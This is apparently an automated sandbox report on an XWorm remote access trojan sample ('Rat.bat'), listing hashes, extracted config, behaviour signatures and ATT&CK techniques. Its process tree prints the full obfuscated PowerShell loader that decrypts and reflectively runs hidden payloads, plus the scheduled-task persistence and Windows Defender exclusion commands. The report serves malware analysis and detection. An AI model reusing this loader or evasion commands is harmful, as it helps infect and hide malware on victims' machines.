xworm | fd9af97638b947c8c1142bc54efa2668a8b65ccdfdbc2c08ff4d338bfa55620f

Analysis

max time kernel
32s
max time network
30s
platform
windows11-21h2_x64
resource
win11-20240412-en
resource tags

arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
submitted
20-04-2024 10:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Rat.bat
Size

557KB
MD5

c88576f629b0a738df2ed3238ab890c6
SHA1

158b12ab42db9a32b2570080e2fda2f4742486df
SHA256

fd9af97638b947c8c1142bc54efa2668a8b65ccdfdbc2c08ff4d338bfa55620f
SHA512

c090ad0c9a3734419b130311e5a812300e9c3e66e7fe2cc4c2d27e257874b6854f754e563ceff68ff6497628e4dcc42d8cb31a106609ff2b8a581f0bbb7bfe5a
SSDEEP

12288:yAGRzigrEv/QWBDiqBTTxzqp3rQWh5TIi0xv/NcnESDHn2:VGtUuq1lhCth43SDW

Score

10^/10

xworm persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

127.0.0.1:7000

Mutex

TQv1TZmQOLwovJma

Attributes

Install_directory
%AppData%
install_file
Client.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1696-54-0x000001C4DA210000-0x000001C4DA220000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

2 1696 powershell.exe
4 4108 powershell.exe
6 4108 powershell.exe

flow	pid	process
2	1696	powershell.exe
4	4108	powershell.exe
6	4108	powershell.exe

Drops startup file 4 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77windows32.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77windows32.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.lnk	powershell.exe

Executes dropped EXE 1 IoCs

Processes:

GorillaTagUtilities.exe

pid process

4528 GorillaTagUtilities.exe

pid	process
4528	GorillaTagUtilities.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-834482027-582050234-2368284635-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client = "C:\\Users\\Admin\\AppData\\Roaming\\Client.exe"	powershell.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2512 schtasks.exe
3456 schtasks.exe

flow	ioc
1	ip-api.com

pid	process
2512	schtasks.exe
3456	schtasks.exe

Modifies registry class 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-834482027-582050234-2368284635-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-834482027-582050234-2368284635-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3244	powershell.exe
3244	powershell.exe
2792	powershell.exe
2792	powershell.exe
1696	powershell.exe
1696	powershell.exe
1776	powershell.exe
1776	powershell.exe
384	powershell.exe
384	powershell.exe
4108	powershell.exe
4108	powershell.exe
3380	powershell.exe
3380	powershell.exe
3380	powershell.exe
3392	powershell.exe
3392	powershell.exe
3392	powershell.exe
2740	powershell.exe
2740	powershell.exe
2740	powershell.exe
2716	powershell.exe
2716	powershell.exe
2716	powershell.exe
416	powershell.exe
4948	powershell.exe
4948	powershell.exe
416	powershell.exe
416	powershell.exe
4948	powershell.exe
4636	powershell.exe
4636	powershell.exe
1168	powershell.exe
1168	powershell.exe
1168	powershell.exe
4636	powershell.exe
1696	powershell.exe
4108	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3244	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeIncreaseQuotaPrivilege	2792	powershell.exe
Token: SeSecurityPrivilege	2792	powershell.exe
Token: SeTakeOwnershipPrivilege	2792	powershell.exe
Token: SeLoadDriverPrivilege	2792	powershell.exe
Token: SeSystemProfilePrivilege	2792	powershell.exe
Token: SeSystemtimePrivilege	2792	powershell.exe
Token: SeProfSingleProcessPrivilege	2792	powershell.exe
Token: SeIncBasePriorityPrivilege	2792	powershell.exe
Token: SeCreatePagefilePrivilege	2792	powershell.exe
Token: SeBackupPrivilege	2792	powershell.exe
Token: SeRestorePrivilege	2792	powershell.exe
Token: SeShutdownPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeSystemEnvironmentPrivilege	2792	powershell.exe
Token: SeRemoteShutdownPrivilege	2792	powershell.exe
Token: SeUndockPrivilege	2792	powershell.exe
Token: SeManageVolumePrivilege	2792	powershell.exe
Token: 33	2792	powershell.exe
Token: 34	2792	powershell.exe
Token: 35	2792	powershell.exe
Token: 36	2792	powershell.exe
Token: SeIncreaseQuotaPrivilege	2792	powershell.exe
Token: SeSecurityPrivilege	2792	powershell.exe
Token: SeTakeOwnershipPrivilege	2792	powershell.exe
Token: SeLoadDriverPrivilege	2792	powershell.exe
Token: SeSystemProfilePrivilege	2792	powershell.exe
Token: SeSystemtimePrivilege	2792	powershell.exe
Token: SeProfSingleProcessPrivilege	2792	powershell.exe
Token: SeIncBasePriorityPrivilege	2792	powershell.exe
Token: SeCreatePagefilePrivilege	2792	powershell.exe
Token: SeBackupPrivilege	2792	powershell.exe
Token: SeRestorePrivilege	2792	powershell.exe
Token: SeShutdownPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeSystemEnvironmentPrivilege	2792	powershell.exe
Token: SeRemoteShutdownPrivilege	2792	powershell.exe
Token: SeUndockPrivilege	2792	powershell.exe
Token: SeManageVolumePrivilege	2792	powershell.exe
Token: 33	2792	powershell.exe
Token: 34	2792	powershell.exe
Token: 35	2792	powershell.exe
Token: 36	2792	powershell.exe
Token: SeIncreaseQuotaPrivilege	2792	powershell.exe
Token: SeSecurityPrivilege	2792	powershell.exe
Token: SeTakeOwnershipPrivilege	2792	powershell.exe
Token: SeLoadDriverPrivilege	2792	powershell.exe
Token: SeSystemProfilePrivilege	2792	powershell.exe
Token: SeSystemtimePrivilege	2792	powershell.exe
Token: SeProfSingleProcessPrivilege	2792	powershell.exe
Token: SeIncBasePriorityPrivilege	2792	powershell.exe
Token: SeCreatePagefilePrivilege	2792	powershell.exe
Token: SeBackupPrivilege	2792	powershell.exe
Token: SeRestorePrivilege	2792	powershell.exe
Token: SeShutdownPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeSystemEnvironmentPrivilege	2792	powershell.exe
Token: SeRemoteShutdownPrivilege	2792	powershell.exe
Token: SeUndockPrivilege	2792	powershell.exe
Token: SeManageVolumePrivilege	2792	powershell.exe
Token: 33	2792	powershell.exe
Token: 34	2792	powershell.exe
Token: 35	2792	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

1696 powershell.exe
4108 powershell.exe

pid	process
1696	powershell.exe
4108	powershell.exe

Suspicious use of WriteProcessMemory 60 IoCs

Processes:

cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.execmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.exe

description	pid	process	target process
PID 2448 wrote to memory of 1868	2448	cmd.exe	net.exe
PID 2448 wrote to memory of 1868	2448	cmd.exe	net.exe
PID 1868 wrote to memory of 5116	1868	net.exe	net1.exe
PID 1868 wrote to memory of 5116	1868	net.exe	net1.exe
PID 2448 wrote to memory of 3244	2448	cmd.exe	powershell.exe
PID 2448 wrote to memory of 3244	2448	cmd.exe	powershell.exe
PID 3244 wrote to memory of 2792	3244	powershell.exe	powershell.exe
PID 3244 wrote to memory of 2792	3244	powershell.exe	powershell.exe
PID 3244 wrote to memory of 1980	3244	powershell.exe	WScript.exe
PID 3244 wrote to memory of 1980	3244	powershell.exe	WScript.exe
PID 1980 wrote to memory of 4436	1980	WScript.exe	cmd.exe
PID 1980 wrote to memory of 4436	1980	WScript.exe	cmd.exe
PID 4436 wrote to memory of 1932	4436	cmd.exe	net.exe
PID 4436 wrote to memory of 1932	4436	cmd.exe	net.exe
PID 1932 wrote to memory of 2236	1932	net.exe	net1.exe
PID 1932 wrote to memory of 2236	1932	net.exe	net1.exe
PID 4436 wrote to memory of 1696	4436	cmd.exe	powershell.exe
PID 4436 wrote to memory of 1696	4436	cmd.exe	powershell.exe
PID 1696 wrote to memory of 4144	1696	powershell.exe	cmd.exe
PID 1696 wrote to memory of 4144	1696	powershell.exe	cmd.exe
PID 4144 wrote to memory of 2064	4144	cmd.exe	net.exe
PID 4144 wrote to memory of 2064	4144	cmd.exe	net.exe
PID 2064 wrote to memory of 3560	2064	net.exe	net1.exe
PID 2064 wrote to memory of 3560	2064	net.exe	net1.exe
PID 4144 wrote to memory of 1776	4144	cmd.exe	powershell.exe
PID 4144 wrote to memory of 1776	4144	cmd.exe	powershell.exe
PID 1776 wrote to memory of 384	1776	powershell.exe	powershell.exe
PID 1776 wrote to memory of 384	1776	powershell.exe	powershell.exe
PID 1776 wrote to memory of 2836	1776	powershell.exe	WScript.exe
PID 1776 wrote to memory of 2836	1776	powershell.exe	WScript.exe
PID 2836 wrote to memory of 476	2836	WScript.exe	cmd.exe
PID 2836 wrote to memory of 476	2836	WScript.exe	cmd.exe
PID 476 wrote to memory of 4772	476	cmd.exe	net.exe
PID 476 wrote to memory of 4772	476	cmd.exe	net.exe
PID 4772 wrote to memory of 4760	4772	net.exe	net1.exe
PID 4772 wrote to memory of 4760	4772	net.exe	net1.exe
PID 476 wrote to memory of 4108	476	cmd.exe	powershell.exe
PID 476 wrote to memory of 4108	476	cmd.exe	powershell.exe
PID 4108 wrote to memory of 4528	4108	powershell.exe	GorillaTagUtilities.exe
PID 4108 wrote to memory of 4528	4108	powershell.exe	GorillaTagUtilities.exe
PID 4108 wrote to memory of 3380	4108	powershell.exe	powershell.exe
PID 4108 wrote to memory of 3380	4108	powershell.exe	powershell.exe
PID 1696 wrote to memory of 3392	1696	powershell.exe	powershell.exe
PID 1696 wrote to memory of 3392	1696	powershell.exe	powershell.exe
PID 4108 wrote to memory of 2740	4108	powershell.exe	powershell.exe
PID 4108 wrote to memory of 2740	4108	powershell.exe	powershell.exe
PID 1696 wrote to memory of 2716	1696	powershell.exe	powershell.exe
PID 1696 wrote to memory of 2716	1696	powershell.exe	powershell.exe
PID 4108 wrote to memory of 416	4108	powershell.exe	powershell.exe
PID 4108 wrote to memory of 416	4108	powershell.exe	powershell.exe
PID 1696 wrote to memory of 4948	1696	powershell.exe	powershell.exe
PID 1696 wrote to memory of 4948	1696	powershell.exe	powershell.exe
PID 4108 wrote to memory of 4636	4108	powershell.exe	powershell.exe
PID 4108 wrote to memory of 4636	4108	powershell.exe	powershell.exe
PID 1696 wrote to memory of 1168	1696	powershell.exe	powershell.exe
PID 1696 wrote to memory of 1168	1696	powershell.exe	powershell.exe
PID 1696 wrote to memory of 2512	1696	powershell.exe	schtasks.exe
PID 1696 wrote to memory of 2512	1696	powershell.exe	schtasks.exe
PID 4108 wrote to memory of 3456	4108	powershell.exe	schtasks.exe
PID 4108 wrote to memory of 3456	4108	powershell.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Rat.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2448

C:\Windows\system32\net.exe
net file
2⤵
- Suspicious use of WriteProcessMemory
PID:1868

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
3⤵
PID:5116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HM+/uw3VIbvfzCE0IMy71A0087SFUx9DztvDpXYML44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EwTj1dlF4Nyp9MG/yZks5w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HJGzG=New-Object System.IO.MemoryStream(,$param_var); $KHsiD=New-Object System.IO.MemoryStream; $rUSlj=New-Object System.IO.Compression.GZipStream($HJGzG, [IO.Compression.CompressionMode]::Decompress); $rUSlj.CopyTo($KHsiD); $rUSlj.Dispose(); $HJGzG.Dispose(); $KHsiD.Dispose(); $KHsiD.ToArray();}function execute_function($param_var,$param2_var){ $gHVNY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XBKrw=$gHVNY.EntryPoint; $XBKrw.Invoke($null, $param2_var);}$bOtAV = 'C:\Users\Admin\AppData\Local\Temp\Rat.bat';$host.UI.RawUI.WindowTitle = $bOtAV;$VXMTQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bOtAV).Split([Environment]::NewLine);foreach ($JPSkT in $VXMTQ) { if ($JPSkT.StartsWith(':: ')) { $bQwAB=$JPSkT.Substring(3); break; }}$payloads_var=[string[]]$bQwAB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_479_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_479.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_479.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:1980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_479.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:4436

C:\Windows\system32\net.exe
net file
5⤵
- Suspicious use of WriteProcessMemory
PID:1932

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
6⤵
PID:2236

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HM+/uw3VIbvfzCE0IMy71A0087SFUx9DztvDpXYML44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EwTj1dlF4Nyp9MG/yZks5w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HJGzG=New-Object System.IO.MemoryStream(,$param_var); $KHsiD=New-Object System.IO.MemoryStream; $rUSlj=New-Object System.IO.Compression.GZipStream($HJGzG, [IO.Compression.CompressionMode]::Decompress); $rUSlj.CopyTo($KHsiD); $rUSlj.Dispose(); $HJGzG.Dispose(); $KHsiD.Dispose(); $KHsiD.ToArray();}function execute_function($param_var,$param2_var){ $gHVNY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XBKrw=$gHVNY.EntryPoint; $XBKrw.Invoke($null, $param2_var);}$bOtAV = 'C:\Users\Admin\AppData\Roaming\startup_str_479.bat';$host.UI.RawUI.WindowTitle = $bOtAV;$VXMTQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bOtAV).Split([Environment]::NewLine);foreach ($JPSkT in $VXMTQ) { if ($JPSkT.StartsWith(':: ')) { $bQwAB=$JPSkT.Substring(3); break; }}$payloads_var=[string[]]$bQwAB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GorillaTagUtilities.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:4144

C:\Windows\system32\net.exe
net file
7⤵
- Suspicious use of WriteProcessMemory
PID:2064

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
8⤵
PID:3560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7KdUSSC9OeCVIcrKQQO2y3pSr7kdahXrU2bQ3WxtWH0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CO38/swHIabz03JHx3ThEA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cMpji=New-Object System.IO.MemoryStream(,$param_var); $wyJuj=New-Object System.IO.MemoryStream; $WceOa=New-Object System.IO.Compression.GZipStream($cMpji, [IO.Compression.CompressionMode]::Decompress); $WceOa.CopyTo($wyJuj); $WceOa.Dispose(); $cMpji.Dispose(); $wyJuj.Dispose(); $wyJuj.ToArray();}function execute_function($param_var,$param2_var){ $PpPoi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aIYSy=$PpPoi.EntryPoint; $aIYSy.Invoke($null, $param2_var);}$vdyOi = 'C:\Users\Admin\AppData\Local\Temp\GorillaTagUtilities.bat';$host.UI.RawUI.WindowTitle = $vdyOi;$faopF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($vdyOi).Split([Environment]::NewLine);foreach ($ycagG in $faopF) { if ($ycagG.StartsWith(':: ')) { $ziaik=$ycagG.Substring(3); break; }}$payloads_var=[string[]]$ziaik.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
7⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_923_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_923.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:384

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_923.vbs"
8⤵
- Suspicious use of WriteProcessMemory
PID:2836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_923.bat" "
9⤵
- Suspicious use of WriteProcessMemory
PID:476

C:\Windows\system32\net.exe
net file
10⤵
- Suspicious use of WriteProcessMemory
PID:4772

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
11⤵
PID:4760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7KdUSSC9OeCVIcrKQQO2y3pSr7kdahXrU2bQ3WxtWH0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CO38/swHIabz03JHx3ThEA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cMpji=New-Object System.IO.MemoryStream(,$param_var); $wyJuj=New-Object System.IO.MemoryStream; $WceOa=New-Object System.IO.Compression.GZipStream($cMpji, [IO.Compression.CompressionMode]::Decompress); $WceOa.CopyTo($wyJuj); $WceOa.Dispose(); $cMpji.Dispose(); $wyJuj.Dispose(); $wyJuj.ToArray();}function execute_function($param_var,$param2_var){ $PpPoi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aIYSy=$PpPoi.EntryPoint; $aIYSy.Invoke($null, $param2_var);}$vdyOi = 'C:\Users\Admin\AppData\Roaming\startup_str_923.bat';$host.UI.RawUI.WindowTitle = $vdyOi;$faopF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($vdyOi).Split([Environment]::NewLine);foreach ($ycagG in $faopF) { if ($ycagG.StartsWith(':: ')) { $ziaik=$ycagG.Substring(3); break; }}$payloads_var=[string[]]$ziaik.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
10⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4108

C:\Users\Admin\AppData\Local\Temp\GorillaTagUtilities.exe
"C:\Users\Admin\AppData\Local\Temp\GorillaTagUtilities.exe"
11⤵
- Executes dropped EXE
PID:4528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
11⤵
- Suspicious behavior: EnumeratesProcesses
PID:3380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
11⤵
- Suspicious behavior: EnumeratesProcesses
PID:2740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\$77windows32.exe '
11⤵
- Suspicious behavior: EnumeratesProcesses
PID:416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77windows32.exe '
11⤵
- Suspicious behavior: EnumeratesProcesses
PID:4636

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77windows32" /tr "C:\ProgramData\$77windows32.exe "
11⤵
- Creates scheduled task(s)
PID:3456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:3392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Client.exe'
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client.exe'
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1168

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"
6⤵
- Creates scheduled task(s)
PID:2512

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\$77windows32.exe
Filesize
440KB

MD5
0e9ccd796e251916133392539572a374

SHA1
eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

SHA256
c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

SHA512
e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
